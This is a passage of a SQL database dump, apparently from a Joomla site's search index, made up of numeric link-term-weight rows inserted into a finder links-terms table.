(260, 36395, 0.98),
(261, 36395, 0.98),
(262, 36395, 0.98),
(263, 36395, 0.98),
(264, 36395, 0.98),
(265, 36395, 0.98),
(266, 36395, 0.98),
(267, 36395, 0.98),
(268, 36395, 0.98),
(270, 36395, 0.98),
(272, 36395, 0.98),
(273, 36395, 0.98),
(274, 36395, 0.98),
(275, 36395, 0.98),
(280, 36395, 0.98),
(288, 36395, 0.98),
(292, 36395, 0.98),
(301, 36395, 0.98),
(304, 36395, 0.98),
(305, 36395, 0.98),
(253, 36398, 0.28),
(272, 36398, 0.28),
(280, 36398, 0.28),
(306, 36398, 0.28),
(241, 36401, 0.32669),
(255, 36401, 0.32669),
(257, 36401, 0.32669),
(258, 36401, 0.32669),
(259, 36401, 0.32669),
(260, 36401, 0.32669),
(261, 36401, 0.32669),
(262, 36401, 0.32669),
(263, 36401, 0.32669),
(264, 36401, 0.32669),
(304, 36401, 0.32669),
(305, 36401, 0.32669),
(168, 36401, 1.12008),
(174, 36401, 1.12008),
(178, 36401, 1.12008),
(250, 36401, 1.12008),
(251, 36401, 1.12008),
(252, 36401, 1.12008),
(256, 36401, 1.12008),
(265, 36401, 1.12008),
(266, 36401, 1.12008),
(267, 36401, 1.12008),
(274, 36401, 1.12008),
(275, 36401, 1.12008),
(280, 36401, 1.12008),
(290, 36401, 1.12008),
(294, 36401, 1.12008),
(299, 36401, 1.12008),
(237, 36401, 1.44677),
(253, 36401, 1.44677),
(254, 36401, 1.44677),
(269, 36401, 1.44677),
(270, 36401, 1.44677),
(272, 36401, 1.44677),
(273, 36401, 1.44677),
(288, 36401, 1.44677),
(292, 36401, 1.44677),
(301, 36401, 1.44677),
(268, 36401, 1.77346),
(245, 36402, 0.81669),
(253, 36402, 0.81669),
(256, 36402, 0.81669),
(265, 36402, 0.81669),
(266, 36402, 0.81669),
(275, 36402, 0.81669),
(253, 36403, 0.93331),
(256, 36403, 0.93331),
(243, 36404, 0.51331),
(253, 36404, 0.51331),
(269, 36404, 0.51331),
(238, 36404, 2.05324),
(261, 36404, 3.07986),
(253, 36407, 0.91),
(275, 36407, 0.91),
(304, 36407, 0.91),
(253, 36408, 1.00331),
(275, 36408, 1.00331),
(240, 36948, 0.86331),
(242, 36948, 0.86331),
(253, 36948, 0.86331),
(304, 36948, 0.86331),
(168, 36950, 0.28),
(244, 36950, 0.28),
(253, 36950, 0.28),
(174, 36950, 0.56),
(247, 36950, 0.56),
(248, 36950, 0.56),
(258, 36950, 0.56),
(238, 36950, 0.84),
(253, 36953, 0.18669),
(275, 36953, 0.18669),
(305, 36953, 0.18669),
(256, 36953, 0.37338),
(238, 36953, 0.56007),
(236, 36956, 0.86331),
(253, 36956, 0.86331),
(240, 36956, 1.72662),
(168, 36958, 0.42),
(236, 36958, 0.42),
(240, 36958, 0.42),
(243, 36958, 0.42),
(253, 36958, 0.42),
(262, 36958, 0.42),
(268, 36958, 0.42),
(269, 36958, 0.42),
(242, 36958, 0.84),
(168, 36961, 0.14),
(178, 36961, 0.14),
(235, 36961, 0.14),
(244, 36961, 0.14),
(248, 36961, 0.14),
(253, 36961, 0.14),
(255, 36961, 0.14),
(256, 36961, 0.14),
(263, 36961, 0.14),
(265, 36961, 0.14),
(266, 36961, 0.14),
(274, 36961, 0.14),
(288, 36961, 0.14),
(236, 36961, 0.28),
(238, 36961, 0.28),
(249, 36961, 0.28),
(258, 36961, 0.28),
(273, 36961, 0.28),
(306, 36961, 0.42),
(237, 36966, 0.95669),
(241, 36966, 0.95669),
(253, 36966, 0.95669),
(254, 36966, 0.95669),
(255, 36966, 0.95669),
(257, 36966, 0.95669),
(258, 36966, 0.95669),
(259, 36966, 0.95669),
(260, 36966, 0.95669),
(261, 36966, 0.95669),
(263, 36966, 0.95669),
(264, 36966, 0.95669),
(268, 36966, 0.95669),
(269, 36966, 0.95669),
(270, 36966, 0.95669),
(272, 36966, 0.95669),
(273, 36966, 0.95669),
(274, 36966, 0.95669),
(275, 36966, 0.95669),
(280, 36966, 0.95669),
(288, 36966, 0.95669),
(292, 36966, 0.95669),
(301, 36966, 0.95669),
(304, 36966, 0.95669),
(305, 36966, 0.95669),
(237, 36967, 1.14331),
(241, 36967, 1.14331),
(253, 36967, 1.14331),
(254, 36967, 1.14331),
(255, 36967, 1.14331),
(257, 36967, 1.14331),
(258, 36967, 1.14331),
(259, 36967, 1.14331),
(260, 36967, 1.14331),
(261, 36967, 1.14331),
(263, 36967, 1.14331),
(264, 36967, 1.14331),
(268, 36967, 1.14331),
(269, 36967, 1.14331),
(270, 36967, 1.14331),
(272, 36967, 1.14331),
(273, 36967, 1.14331),
(288, 36967, 1.14331),
(292, 36967, 1.14331),
(301, 36967, 1.14331),
(304, 36967, 1.14331),
(305, 36967, 1.14331),
(239, 36974, 0.81669),
(245, 36974, 0.81669),
(253, 36974, 0.81669),
(235, 36992, 0.88669),
(253, 36992, 0.88669),
(265, 36994, 0.86331),
(266, 36994, 0.86331),
(253, 36994, 5.17986),
(265, 37002, 0.23331),
(266, 37002, 0.23331),
(253, 37002, 0.46662),
(178, 37007, 0.28),
(253, 37007, 0.28),
(257, 37007, 0.28),
(267, 37007, 0.28),
(306, 37007, 0.28),
(239, 37007, 0.56),
(243, 37007, 0.56),
(305, 37007, 0.84),
(262, 37007, 1.12),
(243, 37008, 0.93331),
(253, 37008, 0.93331),
(236, 46384, 0.91),
(305, 46384, 0.91),
(262, 46384, 2.73),
(254, 46384, 13.65),
(235, 46413, 0.28),
(239, 46413, 0.28),
(254, 46413, 0.28),
(235, 50684, 0.95669),
(236, 50684, 0.95669),
(246, 50684, 0.95669),
(262, 50684, 0.95669),
(264, 50684, 0.95669),
(275, 50684, 0.95669),
(238, 50684, 1.91338),
(239, 50684, 1.91338),
(240, 50684, 1.91338),
(243, 50684, 8.74688),
(242, 50684, 11.4803),
(235, 50685, 1.05),
(242, 50685, 1.05),
(262, 50685, 1.05),
(235, 50687, 0.93331),
(236, 50687, 0.93331),
(235, 50697, 0.42);
INSERT INTO `y57u5_finder_links_terms0` (`link_id`, `term_id`, `weight`) VALUES
(243, 50697, 0.42),
(235, 50702, 0.46669),
(248, 50702, 0.46669),
(178, 50720, 1.00331),
(235, 50720, 2.00662),
(178, 50726, 0.98),
(235, 50726, 0.98),
(235, 50733, 0.88669),
(263, 50733, 0.88669),
(270, 50733, 0.88669),
(301, 50733, 0.88669),
(235, 50739, 0.95669),
(264, 50739, 0.95669),
(245, 50750, 0.81669),
(267, 50750, 0.81669),
(168, 50750, 1.63338),
(235, 50750, 1.63338),
(235, 51330, 0.28),
(236, 51330, 0.56),
(236, 51336, 0.28),
(295, 51336, 0.28),
(235, 51336, 2.84),
(236, 51337, 1.00331),
(235, 51337, 10.1764),
(235, 51339, 1.07331),
(236, 51339, 1.07331),
(235, 51342, 0.28),
(235, 51343, 0.91),
(235, 51344, 1.00331),
(235, 51347, 0.91),
(236, 51347, 0.91),
(174, 51353, 0.37331),
(235, 51353, 0.37331),
(292, 51353, 0.37331),
(305, 51353, 0.37331),
(235, 51359, 0.32669),
(292, 51359, 0.32669),
(305, 51359, 0.32669),
(241, 51359, 0.65338),
(243, 51359, 0.65338),
(235, 51374, 0.37331),
(245, 51374, 0.37331),
(248, 51374, 1.49324),
(290, 51374, 1.49324),
(235, 51382, 0.42),
(242, 51382, 0.42),
(235, 51387, 0.23331),
(242, 51387, 0.23331),
(244, 51387, 0.23331),
(246, 51387, 0.23331),
(269, 51387, 0.23331),
(178, 51387, 0.46662),
(236, 51387, 0.46662),
(263, 51387, 0.46662),
(178, 51390, 0.84),
(235, 51390, 0.84),
(272, 51390, 0.84),
(274, 51390, 0.84),
(280, 51390, 0.84),
(292, 51390, 0.84),
(306, 51390, 1.68),
(237, 63993, 0.93331),
(257, 63993, 0.93331),
(193, 63993, 4.13323),
(193, 63996, 0.91),
(242, 63996, 0.91),
(193, 64031, 0.84),
(258, 64031, 0.84),
(193, 64033, 0.91),
(244, 64033, 0.91),
(238, 64033, 1.82),
(193, 64046, 0.28),
(242, 64046, 0.28),
(259, 64046, 0.28),
(260, 64046, 0.28),
(262, 64046, 0.56),
(193, 64047, 0.91),
(242, 64047, 0.91),
(259, 64047, 0.91),
(260, 64047, 0.91),
(262, 64047, 1.82),
(193, 64058, 0.23331),
(237, 64058, 0.23331),
(241, 64058, 0.23331),
(306, 64058, 0.23331),
(193, 64090, 0.91),
(257, 64090, 0.91),
(256, 64101, 0.86331),
(268, 64101, 0.86331),
(275, 64101, 0.86331),
(193, 64101, 1.72662),
(259, 64101, 1.72662),
(260, 64101, 1.72662),
(265, 64101, 1.72662),
(266, 64101, 1.72662),
(193, 64103, 0.95669),
(259, 64103, 0.95669),
(260, 64103, 0.95669),
(174, 64104, 0.86331),
(178, 64104, 0.86331),
(238, 64104, 0.86331),
(257, 64104, 0.86331),
(263, 64104, 0.86331),
(269, 64104, 0.86331),
(273, 64104, 0.86331),
(275, 64104, 0.86331),
(306, 64104, 0.86331),
(193, 64104, 1.72662),
(193, 64107, 0.84),
(244, 64107, 0.84),
(193, 64115, 0.86331),
(241, 64115, 0.86331),
(193, 64119, 0.88669),
(245, 64119, 0.88669),
(257, 64119, 0.88669),
(259, 64119, 0.88669),
(260, 64119, 0.88669),
(193, 64121, 1.09669),
(238, 64121, 1.09669),
(193, 64162, 0.86331),
(242, 64162, 0.86331),
(193, 64164, 0.28),
(255, 64164, 0.28),
(305, 64164, 0.84),
(193, 64167, 0.32669),
(256, 64167, 0.32669),
(272, 64167, 0.32669),
(280, 64167, 0.32669),
(240, 64170, 0.42),
(264, 64170, 0.42),
(267, 64170, 0.42),
(304, 64170, 0.42),
(193, 64170, 0.84),
(193, 65272, 0.18669),
(261, 65272, 0.18669),
(241, 65275, 0.28),
(306, 65275, 0.28),
(193, 65275, 0.56),
(287, 65275, 0.56),
(174, 65321, 0.37331),
(193, 65321, 0.37331),
(238, 65321, 0.37331),
(255, 65321, 0.37331),
(168, 65324, 0.14),
(193, 65324, 0.14),
(243, 65324, 0.14),
(248, 65324, 0.14),
(272, 65324, 0.14),
(280, 65324, 0.14),
(242, 65324, 0.28),
(193, 65333, 0.98),
(259, 65333, 0.98),
(260, 65333, 0.98),
(193, 65337, 0.42),
(237, 65337, 0.42),
(304, 65337, 0.42),
(268, 65337, 0.84),
(193, 65354, 0.23331),
(240, 65354, 0.23331),
(193, 65359, 1.02669),
(242, 65359, 1.02669),
(174, 65359, 2.05338),
(262, 65359, 2.05338),
(193, 65363, 0.28),
(239, 65363, 0.28),
(193, 65380, 1.00331),
(240, 65380, 1.00331),
(168, 65388, 0.23331),
(242, 65388, 0.23331),
(262, 65388, 0.23331),
(304, 65388, 0.23331),
(306, 65388, 0.23331),
(264, 65388, 0.46662),
(193, 65388, 0.69993),
(193, 65393, 0.88669),
(262, 65393, 0.88669),
(304, 65393, 0.88669),
(174, 65400, 0.91),
(193, 65400, 0.91),
(239, 65400, 0.91),
(267, 65400, 0.91),
(272, 65400, 0.91),
(280, 65400, 0.91),
(237, 68103, 0.28),
(254, 68103, 0.28),
(237, 68162, 0.91),
(254, 68162, 0.91),
(258, 68162, 0.91),
(237, 74243, 0.84),
(238, 74243, 0.84),
(241, 74243, 0.84),
(243, 74243, 0.84),
(244, 74243, 0.84),
(246, 74243, 0.84),
(248, 74243, 0.84),
(255, 74243, 0.84),
(261, 74243, 0.84),
(263, 74243, 0.84),
(288, 74243, 0.84),
(305, 74243, 0.84),
(306, 74243, 0.84),
(240, 75214, 0.98),
(254, 75214, 0.98),
(240, 75215, 1.16669),
(254, 75215, 1.16669),
(262, 75227, 0.88669),
(272, 75227, 0.88669),
(280, 75227, 0.88669),
(305, 75227, 0.88669),
(254, 75227, 1.77338),
(306, 75229, 0.88669),
(262, 75229, 1.77338),
(254, 75229, 2.66007),
(178, 75233, 0.86331),
(245, 75233, 0.86331),
(254, 75233, 0.86331),
(305, 75233, 0.86331),
(238, 75237, 0.18669),
(243, 75237, 0.18669),
(254, 75237, 0.18669),
(257, 75237, 0.18669),
(292, 75237, 0.18669),
(240, 75237, 0.37338),
(242, 75237, 0.37338),
(255, 75237, 0.37338),
(262, 75237, 0.37338),
(265, 75237, 0.56007),
(266, 75237, 0.56007),
(306, 75237, 0.56007),
(239, 75237, 1.49352),
(238, 75238, 0.86331),
(243, 75238, 0.86331),
(254, 75238, 0.86331),
(257, 75238, 0.86331),
(292, 75238, 0.86331),
(240, 75238, 1.72662),
(242, 75238, 1.72662),
(255, 75238, 1.72662),
(262, 75238, 1.72662),
(265, 75238, 2.58993),
(266, 75238, 2.58993),
(306, 75238, 2.58993),
(239, 75238, 6.90648),
(238, 75249, 0.37331),
(254, 75249, 0.37331),
(241, 75262, 0.37331),
(242, 75262, 0.37331),
(259, 75262, 0.37331),
(260, 75262, 0.37331),
(263, 75262, 0.37331),
(269, 75262, 0.37331),
(274, 75262, 0.37331),
(254, 75271, 0.91),
(242, 75271, 1.82),
(242, 75284, 0.81669),
(254, 75284, 0.81669),
(258, 75284, 0.81669),
(267, 75284, 0.81669),
(174, 75289, 0.91),
(178, 75289, 0.91),
(254, 75289, 0.91),
(239, 75298, 0.93331),
(254, 75298, 0.93331),
(241, 75323, 0.14),
(261, 75323, 0.14),
(267, 75323, 0.14),
(273, 75323, 0.14),
(292, 75323, 0.14),
(306, 75323, 0.14),
(240, 75323, 0.28),
(243, 75323, 0.28),
(254, 75323, 0.28),
(269, 75323, 0.28),
(254, 75330, 0.84),
(304, 75330, 0.84),
(242, 75330, 1.68),
(254, 75331, 0.98),
(242, 75331, 1.96),
(241, 75332, 0.42),
(254, 75332, 0.42),
(274, 75332, 0.84),
(254, 75333, 0.98),
(274, 75333, 0.98),
(178, 76008, 0.28),
(273, 76008, 0.28),
(254, 76008, 0.84),
(239, 76019, 0.42),
(240, 76019, 0.42),
(254, 76019, 0.42),
(268, 76019, 0.42),
(305, 76019, 0.42),
(242, 76019, 1.26),
(254, 76026, 0.91),
(304, 76026, 0.91),
(305, 76026, 1.82),
(262, 76026, 2.73),
(254, 76038, 0.95669),
(262, 76038, 0.95669),
(254, 76040, 0.93331),
(262, 76040, 0.93331),
(254, 76050, 0.95669),
(262, 76050, 0.95669),
(305, 76050, 0.95669),
(304, 76050, 1.91338),
(168, 76054, 0.28),
(249, 76054, 0.28),
(254, 76054, 0.28),
(265, 76054, 0.28),
(266, 76054, 0.28),
(244, 76054, 0.56),
(236, 77404, 0.93331),
(241, 77404, 0.93331),
(305, 77404, 0.93331),
(236, 77409, 0.84),
(240, 77409, 0.84),
(247, 77409, 1.68),
(269, 77409, 1.68),
(236, 77421, 0.46669),
(270, 77421, 0.46669),
(301, 77421, 0.46669),
(268, 77429, 0.14),
(236, 77429, 0.28),
(239, 77433, 0.23331),
(262, 77433, 0.23331),
(178, 77433, 0.46662),
(236, 77433, 0.46662),
(236, 77436, 0.91),
(178, 77436, 1.82),
(178, 77443, 0.88669),
(236, 77443, 0.88669),
(268, 77443, 0.88669),
(236, 77458, 0.88669),
(258, 77458, 0.88669),
(236, 77476, 0.84),
(242, 77476, 0.84),
(236, 77478, 0.46669),
(242, 77478, 0.46669),
(178, 77484, 0.91),
(239, 77484, 0.91),
(236, 77484, 1.82),
(178, 77486, 1.00331),
(236, 77486, 1.00331),
(168, 77492, 0.86331),
(241, 77492, 0.86331),
(249, 77492, 0.86331),
(259, 77492, 0.86331),
(260, 77492, 0.86331),
(268, 77492, 0.86331),
(274, 77492, 0.86331),
(240, 77492, 1.72662),
(236, 77492, 2.09661),
(299, 77492, 2.58993),
(243, 77492, 3.45324),
(292, 77492, 8.75643),
(236, 77498, 1.02669),
(249, 77498, 2.05338),
(236, 78090, 0.28),
(262, 78090, 0.28),
(269, 78090, 0.28),
(236, 78106, 0.23331),
(241, 78106, 0.23331),
(243, 78106, 0.93324),
(236, 78107, 0.91),
(243, 78107, 0.91),
(236, 78122, 0.88669),
(243, 78122, 0.88669),
(244, 78122, 0.88669),
(248, 78122, 0.88669),
(263, 78122, 0.88669),
(288, 78122, 0.88669),
(305, 78122, 0.88669),
(241, 78122, 1.77338),
(178, 78122, 3.54676),
(236, 78124, 0.91),
(239, 78124, 0.91),
(247, 78124, 0.91),
(262, 78124, 0.91),
(305, 78124, 0.91),
(178, 78124, 1.82),
(236, 78138, 0.95669),
(262, 78138, 0.95669),
(236, 78140, 0.51331),
(243, 78140, 0.51331),
(261, 78140, 0.51331),
(304, 78140, 0.51331),
(236, 78149, 0.23331),
(242, 78149, 0.46662),
(236, 78150, 0.88669),
(242, 78150, 0.88669),
(242, 82413, 0.18669),
(244, 82413, 0.18669),
(255, 82413, 0.18669),
(261, 82413, 0.18669),
(305, 82413, 0.18669),
(238, 82413, 0.37338),
(237, 84419, 0.88669),
(257, 84419, 0.88669),
(237, 84421, 1.02669),
(257, 84421, 1.02669),
(237, 84432, 0.88669),
(272, 84432, 0.88669),
(274, 84432, 0.88669),
(280, 84432, 0.88669),
(237, 84433, 0.88669),
(248, 84433, 0.88669),
(237, 84445, 0.32669),
(272, 84445, 0.32669),
(280, 84445, 0.32669),
(237, 84451, 0.95669),
(267, 84451, 0.95669),
(257, 84460, 0.37331),
(237, 84460, 0.74662),
(241, 84473, 0.86331),
(242, 84473, 0.86331),
(244, 84473, 0.86331),
(263, 84473, 0.86331),
(274, 84473, 0.86331),
(292, 84473, 0.86331),
(306, 84473, 0.86331),
(168, 84473, 1.72662),
(237, 84473, 1.72662),
(237, 84475, 0.98),
(168, 84475, 1.96),
(237, 84476, 0.95669),
(246, 84476, 0.95669),
(255, 84476, 0.95669),
(261, 84476, 0.95669),
(168, 84486, 0.95669),
(237, 84486, 3.82676),
(239, 84489, 0.91),
(256, 84489, 0.91),
(259, 84489, 0.91),
(260, 84489, 0.91),
(265, 84489, 0.91),
(266, 84489, 0.91),
(304, 84489, 0.91),
(306, 84489, 0.91),
(237, 84489, 1.82),
(237, 84493, 0.88669),
(270, 84493, 0.88669),
(301, 84493, 0.88669),
(305, 84493, 0.88669),
(237, 84852, 0.28),
(246, 84852, 0.28),
(237, 84853, 0.98),
(246, 84853, 0.98),
(237, 84859, 1.02669),
(269, 84859, 1.02669),
(305, 84859, 1.02669),
(241, 84876, 0.56),
(288, 84876, 0.56),
(237, 84876, 1.12),
(264, 84876, 1.12),
(273, 84876, 5.28),
(238, 91684, 1.12),
(242, 91684, 1.12),
(239, 91707, 0.32669),
(240, 91707, 0.32669),
(247, 91707, 0.32669),
(259, 91707, 0.32669),
(260, 91707, 0.32669),
(265, 91707, 0.32669),
(266, 91707, 0.32669),
(174, 91707, 0.65338),
(238, 91707, 0.65338),
(306, 91707, 0.65338),
(258, 91707, 1.30676),
(174, 91717, 0.42),
(178, 91717, 0.42),
(242, 91717, 0.42),
(256, 91717, 0.42),
(238, 91717, 0.84),
(248, 91717, 0.84),
(269, 91717, 0.84),
(174, 91718, 0.98),
(178, 91718, 0.98),
(242, 91718, 0.98),
(256, 91718, 0.98),
(238, 91718, 1.96),
(248, 91718, 1.96),
(269, 91718, 1.96),
(174, 91719, 1.07331),
(238, 91719, 2.14662),
(174, 91751, 1.00331),
(238, 91751, 1.00331),
(306, 91751, 3.00993),
(178, 91759, 0.93331),
(238, 91759, 0.93331),
(269, 91759, 0.93331),
(178, 91761, 0.84),
(238, 91761, 0.84),
(240, 91761, 0.84),
(244, 91761, 0.84),
(249, 91761, 0.84),
(275, 91761, 0.84),
(287, 91761, 0.84),
(288, 91761, 1.68),
(306, 91761, 1.68),
(178, 91769, 0.88669),
(238, 91769, 0.88669),
(262, 91769, 0.88669),
(292, 91769, 0.88669),
(238, 91777, 1.00331),
(256, 91777, 1.00331),
(238, 91788, 0.37331),
(240, 91788, 0.37331),
(238, 91794, 0.86331),
(257, 91794, 0.86331),
(238, 91798, 0.88669),
(262, 91798, 0.88669),
(174, 91810, 0.46669),
(239, 91810, 0.46669),
(240, 91810, 0.46669),
(259, 91810, 0.46669),
(260, 91810, 0.46669),
(292, 91810, 0.46669),
(238, 91810, 0.93338),
(257, 91810, 0.93338),
(306, 91810, 7.46704),
(261, 91810, 13.0673),
(238, 91813, 1.02669),
(261, 91813, 3.08007),
(238, 91814, 1.12),
(261, 91814, 3.36),
(238, 91823, 0.81669),
(258, 91823, 0.81669),
(238, 91825, 0.23331),
(242, 91825, 0.23331),
(259, 91825, 0.23331),
(260, 91825, 0.23331),
(305, 91825, 0.46662),
(304, 91825, 0.69993),
(238, 91826, 0.91),
(242, 91826, 0.91),
(238, 92619, 0.98),
(275, 92619, 0.98),
(238, 92633, 0.37331),
(240, 92633, 0.37331),
(273, 92633, 0.37331),
(275, 92633, 0.37331),
(238, 92638, 0.93331),
(261, 92638, 0.93331),
(264, 92638, 0.93331),
(238, 92654, 0.23331),
(239, 92654, 0.23331),
(240, 92654, 0.23331),
(244, 92654, 0.23331),
(287, 92654, 0.23331),
(238, 92673, 0.91),
(239, 92673, 0.91),
(306, 92673, 0.91),
(238, 92674, 1.00331),
(239, 92674, 1.00331),
(239, 99796, 1.02669),
(264, 99796, 1.02669),
(239, 99797, 1.07331),
(275, 99797, 1.07331),
(240, 99798, 0.86331),
(239, 99798, 1.72662),
(239, 99799, 1.14331),
(240, 99799, 1.14331),
(239, 99801, 2.21),
(240, 99801, 2.21),
(242, 99801, 2.21),
(239, 99802, 2.77661),
(240, 99802, 2.77661),
(242, 99802, 2.77661),
(239, 99809, 0.84),
(240, 99809, 0.84),
(242, 99809, 0.84),
(239, 99810, 0.91),
(240, 99810, 0.91),
(242, 99810, 0.91),
(239, 99813, 0.93331),
(240, 99813, 0.93331),
(239, 99817, 0.93331),
(243, 99817, 0.93331),
(272, 99817, 0.93331),
(280, 99817, 0.93331),
(239, 99822, 0.91),
(240, 99822, 1.82),
(239, 99828, 0.88669),
(243, 99828, 0.88669),
(262, 99828, 0.88669),
(305, 99828, 0.88669),
(239, 99832, 0.84),
(242, 99832, 0.84),
(174, 99834, 0.84),
(242, 99834, 0.84),
(257, 99834, 0.84),
(262, 99834, 0.84),
(290, 99834, 0.84),
(239, 99834, 1.68),
(239, 99836, 1.05),
(242, 99836, 1.05),
(304, 99837, 0.86331),
(239, 99837, 2.09661),
(240, 99837, 2.09661),
(242, 99837, 2.09661),
(239, 99838, 2.26661),
(240, 99838, 2.26661),
(242, 99838, 2.26661),
(270, 99851, 0.32669),
(301, 99851, 0.32669),
(239, 99851, 0.65338),
(306, 99851, 3.59359),
(239, 99856, 0.23331),
(256, 99856, 0.23331),
(261, 99856, 0.23331),
(263, 99856, 0.23331),
(287, 99856, 0.23331),
(239, 99879, 0.32669),
(248, 99879, 0.32669),
(265, 99879, 0.32669),
(266, 99879, 0.32669),
(240, 99879, 0.65338),
(239, 99882, 0.88669),
(240, 99882, 0.88669),
(242, 99882, 0.88669),
(239, 99883, 1.00331),
(240, 99883, 1.00331),
(239, 99888, 0.84),
(245, 99888, 0.84),
(262, 99888, 0.84),
(263, 99888, 0.84),
(275, 99888, 0.84),
(242, 99888, 1.68),
(239, 99889, 1.09669),
(242, 99889, 1.09669),
(239, 99905, 0.86331),
(242, 99905, 0.86331),
(258, 99905, 0.86331),
(263, 99905, 0.86331),
(292, 99905, 0.86331),
(306, 99905, 0.86331),
(239, 99906, 0.93331),
(258, 99906, 0.93331),
(263, 99906, 0.93331),
(174, 99907, 0.84),
(239, 99907, 0.84),
(239, 99911, 0.88669),
(240, 99911, 0.88669),
(239, 99912, 0.95669),
(240, 99912, 0.95669),
(239, 99913, 2.38),
(242, 99913, 2.38),
(240, 99913, 3.36),
(239, 99914, 2.66339),
(240, 99914, 2.66339),
(242, 99914, 2.66339),
(239, 99915, 0.86331),
(258, 99915, 0.86331),
(239, 99921, 0.86331),
(265, 99921, 0.86331),
(266, 99921, 0.86331),
(306, 99921, 2.58993),
(178, 99926, 0.93331),
(239, 99926, 0.93331),
(267, 99926, 0.93331),
(239, 99932, 0.98),
(240, 99932, 0.98),
(174, 99935, 0.88669),
(239, 99935, 0.88669),
(248, 99935, 0.88669),
(256, 99935, 0.88669),
(259, 99935, 0.88669),
(260, 99935, 0.88669),
(272, 99935, 0.88669),
(280, 99935, 0.88669),
(306, 99935, 1.77338),
(239, 99941, 0.84),
(241, 99941, 0.84),
(249, 99941, 0.84),
(261, 99941, 0.84),
(275, 99941, 0.84),
(174, 99943, 0.98),
(239, 99943, 0.98),
(240, 99943, 0.98),
(241, 99943, 0.98),
(242, 99943, 0.98),
(246, 99943, 0.98),
(261, 99943, 0.98),
(269, 99943, 0.98),
(270, 99943, 0.98),
(301, 99943, 0.98),
(306, 99943, 0.98),
(239, 99949, 0.32669),
(265, 99949, 0.32669),
(266, 99949, 0.32669),
(239, 99952, 0.37331),
(248, 99952, 0.37331),
(239, 99959, 1.09669),
(259, 99959, 1.09669),
(260, 99959, 1.09669),
(265, 99959, 1.09669),
(266, 99959, 1.09669),
(239, 99960, 0.86331),
(244, 99960, 0.86331),
(174, 99968, 0.84),
(239, 99968, 0.84),
(242, 99968, 1.68),
(240, 99968, 5.04),
(239, 99969, 0.91),
(240, 99969, 4.55),
(239, 99970, 0.86331),
(259, 99970, 1.72662),
(260, 99970, 1.72662),
(273, 99972, 0.18669),
(239, 99972, 0.37338),
(239, 99977, 0.14),
(240, 99977, 0.14),
(239, 99980, 1.02669),
(240, 99980, 1.02669),
(262, 99980, 1.02669),
(242, 99980, 9.24021),
(242, 99984, 1.00331),
(239, 99984, 2.00662),
(240, 99984, 4.01324),
(239, 99986, 1.00331),
(261, 99986, 1.00331),
(306, 99986, 1.00331),
(239, 100971, 0.23331),
(240, 100971, 0.23331),
(239, 100983, 0.23331),
(242, 100983, 0.23331),
(306, 100983, 0.23331),
(290, 100983, 4.23291),
(239, 100984, 0.91),
(242, 100984, 0.91),
(290, 100984, 10.14),
(239, 101003, 0.95669),
(263, 101003, 0.95669),
(178, 101010, 0.18669),
(257, 101010, 0.18669),
(274, 101010, 0.18669),
(239, 101010, 0.37338),
(239, 101021, 0.32669),
(240, 101021, 0.65338),
(239, 101027, 0.23331),
(268, 101027, 0.23331),
(239, 101032, 0.95669),
(268, 101032, 0.95669),
(239, 101033, 1.02669),
(268, 101033, 1.02669),
(239, 101056, 0.86331),
(240, 101056, 0.86331),
(242, 101056, 0.86331),
(245, 101056, 0.86331),
(174, 101058, 1.02669),
(239, 101058, 1.02669),
(239, 101059, 0.28),
(240, 101059, 0.28),
(244, 101059, 0.28),
(287, 101059, 0.28),
(295, 101059, 0.28),
(255, 101851, 1.07331),
(274, 101851, 1.07331),
(255, 102219, 0.84),
(258, 102219, 0.84),
(178, 102219, 1.68),
(292, 102219, 1.68),
(306, 102219, 1.68),
(255, 102221, 0.88669),
(257, 102221, 0.88669),
(255, 102222, 1.00331),
(257, 102222, 1.00331),
(168, 102234, 0.18669),
(178, 102234, 0.18669),
(240, 102234, 0.18669),
(246, 102234, 0.18669),
(255, 102234, 0.18669),
(288, 102234, 0.18669),
(242, 102234, 0.37338),
(255, 102245, 0.95669),
(261, 102245, 0.95669),
(292, 102245, 1.91338),
(247, 102253, 0.93331),
(255, 102253, 0.93331),
(258, 102253, 0.93331),
(268, 102253, 0.93331),
(306, 102253, 0.93331),
(262, 102253, 1.86662),
(305, 102253, 1.86662),
(246, 102255, 0.23331),
(255, 102255, 0.23331),
(178, 108491, 0.14),
(240, 108491, 0.14),
(248, 108491, 0.14),
(256, 108491, 0.14),
(174, 110003, 0.88669),
(257, 110003, 0.88669),
(240, 110028, 0.91),
(257, 110028, 0.91),
(257, 110030, 0.81669),
(264, 110030, 0.81669),
(274, 110030, 0.81669),
(292, 110030, 0.81669),
(304, 110030, 0.81669),
(305, 110030, 0.81669),
(306, 110030, 0.81669),
(178, 110030, 1.63338),
(269, 110030, 3.26676),
(242, 110043, 0.84),
(257, 110043, 0.84),
(257, 110053, 1.07331),
(261, 110053, 1.07331),
(257, 110055, 1.05),
(261, 110055, 1.05),
(257, 110059, 0.91),
(265, 110059, 0.91),
(266, 110059, 0.91),
(257, 110464, 5.3332),
(260, 110464, 5.3332),
(178, 110467, 0.28),
(242, 110467, 0.28),
(257, 110467, 0.56),
(243, 110472, 0.32669),
(257, 110472, 0.32669),
(259, 110472, 0.32669),
(260, 110472, 0.32669),
(268, 110472, 0.32669),
(273, 110472, 0.32669),
(292, 110472, 0.32669),
(290, 110472, 0.65338),
(240, 110472, 1.30676),
(261, 110472, 3.2669),
(240, 110473, 1.00331),
(257, 110473, 1.00331),
(257, 110480, 0.28),
(174, 110480, 0.56),
(257, 110487, 0.86331),
(274, 110487, 0.86331),
(257, 110491, 0.95669),
(268, 110491, 0.95669),
(174, 110498, 0.37331),
(257, 110498, 0.37331),
(259, 110498, 0.37331),
(260, 110498, 0.37331),
(288, 110498, 0.37331),
(306, 110498, 0.37331),
(262, 110498, 0.74662),
(243, 110498, 1.49324),
(257, 110503, 0.37331),
(274, 110503, 0.37331),
(304, 110503, 0.37331),
(258, 110503, 0.74662),
(257, 110504, 0.95669),
(258, 110504, 1.91338),
(257, 110506, 0.93331),
(258, 110506, 0.93331),
(244, 110508, 0.28),
(257, 110508, 0.28),
(272, 110508, 0.28),
(280, 110508, 0.28),
(257, 110511, 0.98007),
(262, 110511, 0.98007),
(240, 113301, 0.86331),
(241, 113301, 0.86331),
(243, 113301, 0.86331),
(292, 113301, 0.86331),
(269, 113301, 1.72662),
(240, 114378, 0.28),
(241, 114378, 0.28),
(245, 114378, 0.28),
(256, 114955, 0.86331),
(272, 114955, 0.86331),
(280, 114955, 0.86331),
(256, 114956, 0.93331),
(272, 114956, 0.93331),
(280, 114956, 0.93331),
(168, 114982, 0.23331),
(241, 114982, 0.23331),
(243, 114982, 0.23331),
(244, 114982, 0.23331),
